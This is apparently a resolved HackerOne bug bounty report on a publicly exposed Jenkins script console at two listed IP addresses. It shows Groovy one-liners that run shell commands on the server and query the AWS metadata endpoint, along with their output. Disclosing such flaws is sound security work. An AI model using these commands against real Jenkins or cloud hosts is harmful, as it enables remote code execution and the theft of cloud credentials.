Public Jenkins instance with /script enabled
Critical
Vulnerability Details
Hi,
First of all. I'm not 100% able to verify that this server is actually owned by Ubnt as there are multiple DNS Name's in the SSL certificate.
```
DNS Name: *.uum.com
DNS Name: *.ubnt.com
DNS Name: *.svc.ubnt.com
DNS Name: *.api.uum.com
DNS Name: *.svc.uum.com
DNS Name: uum.com
```
So, the server hosted on https://54.191.232.223/and https://54.186.253.37/is reachable from the internet and has the scirpt console enabled.
You can execute code on it by going to: https://54.186.253.37/script and insert the following code:
```
"ls /".execute().text
```
__result__
````
Result: bin
boot
dev
docker-java-home
etc
home
lib
lib64
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
```
It also allows reaching the AWS metadata server:
```
"curl http://169.254.169.254/latest/meta-data/".execute().text
```
__Result__
```
ami-id
ami-launch-index
ami-manifest-path
block-device-mapping/
hostname
iam/
instance-action
instance-id
instance-type
local-hostname
local-ipv4
mac
metrics/
network/
placement/
profile
public-hostname
public-ipv4
public-keys/
reservation-id
security-groups
services/
```
## Impact
RCE
{F340446}
{F340447}
Actions
View on HackerOneReport Stats
- Report ID: 403402
- State: Closed
- Substate: resolved
- Upvotes: 72